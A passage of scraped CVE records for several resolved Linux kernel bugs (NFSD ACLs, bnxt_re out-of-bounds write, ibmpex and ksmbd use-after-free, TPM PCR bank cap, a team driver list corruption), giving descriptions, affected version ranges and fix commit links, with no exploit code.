"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFSD: NFSv4 file creation neglects setting ACL\n\nAn NFSv4 client that sets an ACL with a named principal during file\ncreation retrieves the ACL afterwards, and finds that it is only a\ndefault ACL (based on the mode bits) and not the ACL that was\nrequested during file creation. This violates RFC 8881 section\n6.4.1.3: \"the ACL attribute is set as given\".\n\nThe issue occurs in nfsd_create_setattr(), which calls\nnfsd_attrs_valid() to determine whether to call nfsd_setattr().\nHowever, nfsd_attrs_valid() checks only for iattr changes and\nsecurity labels, but not POSIX ACLs. When only an ACL is present,\nthe function returns false, nfsd_setattr() is skipped, and the\nPOSIX ACL is never applied to the inode.\n\nSubsequently, when the client retrieves the ACL, the server finds\nno POSIX ACL on the inode and returns one generated from the file\u0027s\nmode bits rather than returning the originally-specified ACL."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:14.365Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c182e1e0b7640f6bcc0c5ca8d473f7c57199ea3d"
},
{
"url": "https://git.kernel.org/stable/c/75f91534f9acdfef77f8fa094313b7806f801725"
},
{
"url": "https://git.kernel.org/stable/c/60dbdef2ebc2317266a385e4debdb1bb0e57afe1"
},
{
"url": "https://git.kernel.org/stable/c/381261f24f4e4b41521c0e5ef5cc0b9a786a9862"
},
{
"url": "https://git.kernel.org/stable/c/bf4e671c651534a307ab2fabba4926116beef8c3"
},
{
"url": "https://git.kernel.org/stable/c/214b396480061cbc8b16f2c518b2add7fbfa5192"
},
{
"url": "https://git.kernel.org/stable/c/913f7cf77bf14c13cfea70e89bcb6d0b22239562"
}
],
"title": "NFSD: NFSv4 file creation neglects setting ACL",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68803",
"datePublished": "2026-01-13T15:29:11.732Z",
"dateReserved": "2025-12-24T10:30:51.045Z",
"dateUpdated": "2026-01-19T12:19:14.365Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71092 (GCVE-0-2025-71092)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-13 15:34
VLAI?
EPSS
Title
RDMA/bnxt_re: Fix OOB write in bnxt_re_copy_err_stats()
Summary
In the Linux kernel, the following vulnerability has been resolved:
RDMA/bnxt_re: Fix OOB write in bnxt_re_copy_err_stats()
Commit ef56081d1864 ("RDMA/bnxt_re: RoCE related hardware counters
update") added three new counters and placed them after
BNXT_RE_OUT_OF_SEQ_ERR.
BNXT_RE_OUT_OF_SEQ_ERR acts as a boundary marker for allocating hardware
statistics with different num_counters values on chip_gen_p5_p7 devices.
As a result, BNXT_RE_NUM_STD_COUNTERS are used when allocating
hw_stats, which leads to an out-of-bounds write in
bnxt_re_copy_err_stats().
The counters BNXT_RE_REQ_CQE_ERROR, BNXT_RE_RESP_CQE_ERROR, and
BNXT_RE_RESP_REMOTE_ACCESS_ERRS are applicable to generic hardware, not
only p5/p7 devices.
Fix this by moving these counters before BNXT_RE_OUT_OF_SEQ_ERR so they
are included in the generic counter set.
Severity ?
No CVSS data available.
Assigner
References
Impacted products
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/infiniband/hw/bnxt_re/hw_counters.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "369a161c48723f60f06f3510b82ea7d96d0499ab",
"status": "affected",
"version": "ef56081d1864582a6db50710733416c0510b7826",
"versionType": "git"
},
{
"lessThan": "9b68a1cc966bc947d00e4c0df7722d118125aa37",
"status": "affected",
"version": "ef56081d1864582a6db50710733416c0510b7826",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/infiniband/hw/bnxt_re/hw_counters.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.18"
},
{
"lessThan": "6.18",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc4",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "6.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc4",
"versionStartIncluding": "6.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/bnxt_re: Fix OOB write in bnxt_re_copy_err_stats()\n\nCommit ef56081d1864 (\"RDMA/bnxt_re: RoCE related hardware counters\nupdate\") added three new counters and placed them after\nBNXT_RE_OUT_OF_SEQ_ERR.\n\nBNXT_RE_OUT_OF_SEQ_ERR acts as a boundary marker for allocating hardware\nstatistics with different num_counters values on chip_gen_p5_p7 devices.\n\nAs a result, BNXT_RE_NUM_STD_COUNTERS are used when allocating\nhw_stats, which leads to an out-of-bounds write in\nbnxt_re_copy_err_stats().\n\nThe counters BNXT_RE_REQ_CQE_ERROR, BNXT_RE_RESP_CQE_ERROR, and\nBNXT_RE_RESP_REMOTE_ACCESS_ERRS are applicable to generic hardware, not\nonly p5/p7 devices.\n\nFix this by moving these counters before BNXT_RE_OUT_OF_SEQ_ERR so they\nare included in the generic counter set."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:34:53.110Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/369a161c48723f60f06f3510b82ea7d96d0499ab"
},
{
"url": "https://git.kernel.org/stable/c/9b68a1cc966bc947d00e4c0df7722d118125aa37"
}
],
"title": "RDMA/bnxt_re: Fix OOB write in bnxt_re_copy_err_stats()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71092",
"datePublished": "2026-01-13T15:34:53.110Z",
"dateReserved": "2026-01-13T15:30:19.650Z",
"dateUpdated": "2026-01-13T15:34:53.110Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68789 (GCVE-0-2025-68789)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
hwmon: (ibmpex) fix use-after-free in high/low store
Summary
In the Linux kernel, the following vulnerability has been resolved:
hwmon: (ibmpex) fix use-after-free in high/low store
The ibmpex_high_low_store() function retrieves driver data using
dev_get_drvdata() and uses it without validation. This creates a race
condition where the sysfs callback can be invoked after the data
structure is freed, leading to use-after-free.
Fix by adding a NULL check after dev_get_drvdata(), and reordering
operations in the deletion path to prevent TOCTOU.
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
57c7c3a0fdea95eddcaeba31e7ca7dfc917682ab , < 3ce9b7ae9d4d148672b35147aaf7987a4f82bb94
(git)
Affected: 57c7c3a0fdea95eddcaeba31e7ca7dfc917682ab , < 533ead425f8109b02fecc7e72d612b8898ec347a (git) Affected: 57c7c3a0fdea95eddcaeba31e7ca7dfc917682ab , < fa37adcf1d564ef58b9dfb01b6c36d35c5294bad (git) Affected: 57c7c3a0fdea95eddcaeba31e7ca7dfc917682ab , < 68d62e5bebbd118b763e8bb210d5cf2198ef450c (git) Affected: 57c7c3a0fdea95eddcaeba31e7ca7dfc917682ab , < 5aa2139201667c1f644601e4529c4acd6bf8db5a (git) Affected: 57c7c3a0fdea95eddcaeba31e7ca7dfc917682ab , < 6946c726c3f4c36f0f049e6f97e88c510b15f65d (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/hwmon/ibmpex.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "3ce9b7ae9d4d148672b35147aaf7987a4f82bb94",
"status": "affected",
"version": "57c7c3a0fdea95eddcaeba31e7ca7dfc917682ab",
"versionType": "git"
},
{
"lessThan": "533ead425f8109b02fecc7e72d612b8898ec347a",
"status": "affected",
"version": "57c7c3a0fdea95eddcaeba31e7ca7dfc917682ab",
"versionType": "git"
},
{
"lessThan": "fa37adcf1d564ef58b9dfb01b6c36d35c5294bad",
"status": "affected",
"version": "57c7c3a0fdea95eddcaeba31e7ca7dfc917682ab",
"versionType": "git"
},
{
"lessThan": "68d62e5bebbd118b763e8bb210d5cf2198ef450c",
"status": "affected",
"version": "57c7c3a0fdea95eddcaeba31e7ca7dfc917682ab",
"versionType": "git"
},
{
"lessThan": "5aa2139201667c1f644601e4529c4acd6bf8db5a",
"status": "affected",
"version": "57c7c3a0fdea95eddcaeba31e7ca7dfc917682ab",
"versionType": "git"
},
{
"lessThan": "6946c726c3f4c36f0f049e6f97e88c510b15f65d",
"status": "affected",
"version": "57c7c3a0fdea95eddcaeba31e7ca7dfc917682ab",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/hwmon/ibmpex.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.24"
},
{
"lessThan": "2.6.24",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "2.6.24",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "2.6.24",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "2.6.24",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "2.6.24",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "2.6.24",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "2.6.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nhwmon: (ibmpex) fix use-after-free in high/low store\n\nThe ibmpex_high_low_store() function retrieves driver data using\ndev_get_drvdata() and uses it without validation. This creates a race\ncondition where the sysfs callback can be invoked after the data\nstructure is freed, leading to use-after-free.\n\nFix by adding a NULL check after dev_get_drvdata(), and reordering\noperations in the deletion path to prevent TOCTOU."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:05.954Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/3ce9b7ae9d4d148672b35147aaf7987a4f82bb94"
},
{
"url": "https://git.kernel.org/stable/c/533ead425f8109b02fecc7e72d612b8898ec347a"
},
{
"url": "https://git.kernel.org/stable/c/fa37adcf1d564ef58b9dfb01b6c36d35c5294bad"
},
{
"url": "https://git.kernel.org/stable/c/68d62e5bebbd118b763e8bb210d5cf2198ef450c"
},
{
"url": "https://git.kernel.org/stable/c/5aa2139201667c1f644601e4529c4acd6bf8db5a"
},
{
"url": "https://git.kernel.org/stable/c/6946c726c3f4c36f0f049e6f97e88c510b15f65d"
}
],
"title": "hwmon: (ibmpex) fix use-after-free in high/low store",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68789",
"datePublished": "2026-01-13T15:29:02.079Z",
"dateReserved": "2025-12-24T10:30:51.037Z",
"dateUpdated": "2026-01-19T12:19:05.954Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68817 (GCVE-0-2025-68817)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-02-06 16:31
VLAI?
EPSS
Title
ksmbd: fix use-after-free in ksmbd_tree_connect_put under concurrency
Summary
In the Linux kernel, the following vulnerability has been resolved:
ksmbd: fix use-after-free in ksmbd_tree_connect_put under concurrency
Under high concurrency, A tree-connection object (tcon) is freed on
a disconnect path while another path still holds a reference and later
executes *_put()/write on it.
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
dd45db4d9bbc8f122a9b4db5ce94ae29fcf03d3c , < 446beed646b2e426dd53d27358365f8678e1dd01
(git)
Affected: 7b58ee8d0b91359554cf219cd4f33872ea2afd66 , < d092de8a26c952379ded8e6b0bda31d89befac1a (git) Affected: 33b235a6e6ebe0f05f3586a71e8d281d00f71e2e , < d64977495e44855f2b28d8ce56107c963a7a50e4 (git) Affected: 33b235a6e6ebe0f05f3586a71e8d281d00f71e2e , < 21a3d01fc6db5129f81edb0ab7cb94fd758bcbea (git) Affected: 33b235a6e6ebe0f05f3586a71e8d281d00f71e2e , < 063cbbc6f595ea36ad146e1b7d2af820894beb21 (git) Affected: 33b235a6e6ebe0f05f3586a71e8d281d00f71e2e , < b39a1833cc4a2755b02603eec3a71a85e9dff926 (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/smb/server/mgmt/tree_connect.c",
"fs/smb/server/mgmt/tree_connect.h",
"fs/smb/server/smb2pdu.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "446beed646b2e426dd53d27358365f8678e1dd01",
"status": "affected",
"version": "dd45db4d9bbc8f122a9b4db5ce94ae29fcf03d3c",
"versionType": "git"
},
{
"lessThan": "d092de8a26c952379ded8e6b0bda31d89befac1a",
"status": "affected",
"version": "7b58ee8d0b91359554cf219cd4f33872ea2afd66",
"versionType": "git"
},
{
"lessThan": "d64977495e44855f2b28d8ce56107c963a7a50e4",
"status": "affected",
"version": "33b235a6e6ebe0f05f3586a71e8d281d00f71e2e",
"versionType": "git"
},
{
"lessThan": "21a3d01fc6db5129f81edb0ab7cb94fd758bcbea",
"status": "affected",
"version": "33b235a6e6ebe0f05f3586a71e8d281d00f71e2e",
"versionType": "git"
},
{
"lessThan": "063cbbc6f595ea36ad146e1b7d2af820894beb21",
"status": "affected",
"version": "33b235a6e6ebe0f05f3586a71e8d281d00f71e2e",
"versionType": "git"
},
{
"lessThan": "b39a1833cc4a2755b02603eec3a71a85e9dff926",
"status": "affected",
"version": "33b235a6e6ebe0f05f3586a71e8d281d00f71e2e",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/smb/server/mgmt/tree_connect.c",
"fs/smb/server/mgmt/tree_connect.h",
"fs/smb/server/smb2pdu.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.6"
},
{
"lessThan": "6.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.199",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.199",
"versionStartIncluding": "5.15.145",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "6.1.71",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "6.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: fix use-after-free in ksmbd_tree_connect_put under concurrency\n\nUnder high concurrency, A tree-connection object (tcon) is freed on\na disconnect path while another path still holds a reference and later\nexecutes *_put()/write on it."
}
],
"providerMetadata": {
"dateUpdated": "2026-02-06T16:31:37.271Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/446beed646b2e426dd53d27358365f8678e1dd01"
},
{
"url": "https://git.kernel.org/stable/c/d092de8a26c952379ded8e6b0bda31d89befac1a"
},
{
"url": "https://git.kernel.org/stable/c/d64977495e44855f2b28d8ce56107c963a7a50e4"
},
{
"url": "https://git.kernel.org/stable/c/21a3d01fc6db5129f81edb0ab7cb94fd758bcbea"
},
{
"url": "https://git.kernel.org/stable/c/063cbbc6f595ea36ad146e1b7d2af820894beb21"
},
{
"url": "https://git.kernel.org/stable/c/b39a1833cc4a2755b02603eec3a71a85e9dff926"
}
],
"title": "ksmbd: fix use-after-free in ksmbd_tree_connect_put under concurrency",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68817",
"datePublished": "2026-01-13T15:29:21.210Z",
"dateReserved": "2025-12-24T10:30:51.048Z",
"dateUpdated": "2026-02-06T16:31:37.271Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71077 (GCVE-0-2025-71077)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:31 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
tpm: Cap the number of PCR banks
Summary
In the Linux kernel, the following vulnerability has been resolved:
tpm: Cap the number of PCR banks
tpm2_get_pcr_allocation() does not cap any upper limit for the number of
banks. Cap the limit to eight banks so that out of bounds values coming
from external I/O cause on only limited harm.
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
bcfff8384f6c4e6627676ef07ccad9cfacd67849 , < 8ceee7288152bc121a6bf92997261838c78bfe06
(git)
Affected: bcfff8384f6c4e6627676ef07ccad9cfacd67849 , < 275c686f1e3cc056ec66c764489ec1fe1e51b950 (git) Affected: bcfff8384f6c4e6627676ef07ccad9cfacd67849 , < ceb70d31da5671d298bad94ae6c20e4bbb800f96 (git) Affected: bcfff8384f6c4e6627676ef07ccad9cfacd67849 , < d88481653d74d622d1d0d2c9bad845fc2cc6fd23 (git) Affected: bcfff8384f6c4e6627676ef07ccad9cfacd67849 , < b69492161c056d36789aee42a87a33c18c8ed5e1 (git) Affected: bcfff8384f6c4e6627676ef07ccad9cfacd67849 , < 858344bc9210bea9ab2bdc7e9e331ba84c164e50 (git) Affected: bcfff8384f6c4e6627676ef07ccad9cfacd67849 , < faf07e611dfa464b201223a7253e9dc5ee0f3c9e (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/char/tpm/tpm-chip.c",
"drivers/char/tpm/tpm1-cmd.c",
"drivers/char/tpm/tpm2-cmd.c",
"include/linux/tpm.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "8ceee7288152bc121a6bf92997261838c78bfe06",
"status": "affected",
"version": "bcfff8384f6c4e6627676ef07ccad9cfacd67849",
"versionType": "git"
},
{
"lessThan": "275c686f1e3cc056ec66c764489ec1fe1e51b950",
"status": "affected",
"version": "bcfff8384f6c4e6627676ef07ccad9cfacd67849",
"versionType": "git"
},
{
"lessThan": "ceb70d31da5671d298bad94ae6c20e4bbb800f96",
"status": "affected",
"version": "bcfff8384f6c4e6627676ef07ccad9cfacd67849",
"versionType": "git"
},
{
"lessThan": "d88481653d74d622d1d0d2c9bad845fc2cc6fd23",
"status": "affected",
"version": "bcfff8384f6c4e6627676ef07ccad9cfacd67849",
"versionType": "git"
},
{
"lessThan": "b69492161c056d36789aee42a87a33c18c8ed5e1",
"status": "affected",
"version": "bcfff8384f6c4e6627676ef07ccad9cfacd67849",
"versionType": "git"
},
{
"lessThan": "858344bc9210bea9ab2bdc7e9e331ba84c164e50",
"status": "affected",
"version": "bcfff8384f6c4e6627676ef07ccad9cfacd67849",
"versionType": "git"
},
{
"lessThan": "faf07e611dfa464b201223a7253e9dc5ee0f3c9e",
"status": "affected",
"version": "bcfff8384f6c4e6627676ef07ccad9cfacd67849",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/char/tpm/tpm-chip.c",
"drivers/char/tpm/tpm1-cmd.c",
"drivers/char/tpm/tpm2-cmd.c",
"include/linux/tpm.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.1"
},
{
"lessThan": "5.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "5.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntpm: Cap the number of PCR banks\n\ntpm2_get_pcr_allocation() does not cap any upper limit for the number of\nbanks. Cap the limit to eight banks so that out of bounds values coming\nfrom external I/O cause on only limited harm."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:38.319Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/8ceee7288152bc121a6bf92997261838c78bfe06"
},
{
"url": "https://git.kernel.org/stable/c/275c686f1e3cc056ec66c764489ec1fe1e51b950"
},
{
"url": "https://git.kernel.org/stable/c/ceb70d31da5671d298bad94ae6c20e4bbb800f96"
},
{
"url": "https://git.kernel.org/stable/c/d88481653d74d622d1d0d2c9bad845fc2cc6fd23"
},
{
"url": "https://git.kernel.org/stable/c/b69492161c056d36789aee42a87a33c18c8ed5e1"
},
{
"url": "https://git.kernel.org/stable/c/858344bc9210bea9ab2bdc7e9e331ba84c164e50"
},
{
"url": "https://git.kernel.org/stable/c/faf07e611dfa464b201223a7253e9dc5ee0f3c9e"
}
],
"title": "tpm: Cap the number of PCR banks",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71077",
"datePublished": "2026-01-13T15:31:29.435Z",
"dateReserved": "2026-01-13T15:30:19.648Z",
"dateUpdated": "2026-01-19T12:19:38.319Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71091 (GCVE-0-2025-71091)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
team: fix check for port enabled in team_queue_override_port_prio_changed()
Summary
In the Linux kernel, the following vulnerability has been resolved:
team: fix check for port enabled in team_queue_override_port_prio_changed()
There has been a syzkaller bug reported recently with the following
trace:
list_del corruption, ffff888058bea080->prev is LIST_POISON2 (dead000000000122)
------------[ cut here ]------------
kernel BUG at lib/list_debug.c:59!
Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI
CPU: 3 UID: 0 PID: 21246 Comm: syz.0.2928 Not tainted syzkaller #0 PREEMPT(full)
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014
RIP: 0010:__list_del_entry_valid_or_report+0x13e/0x200 lib/list_debug.c:59
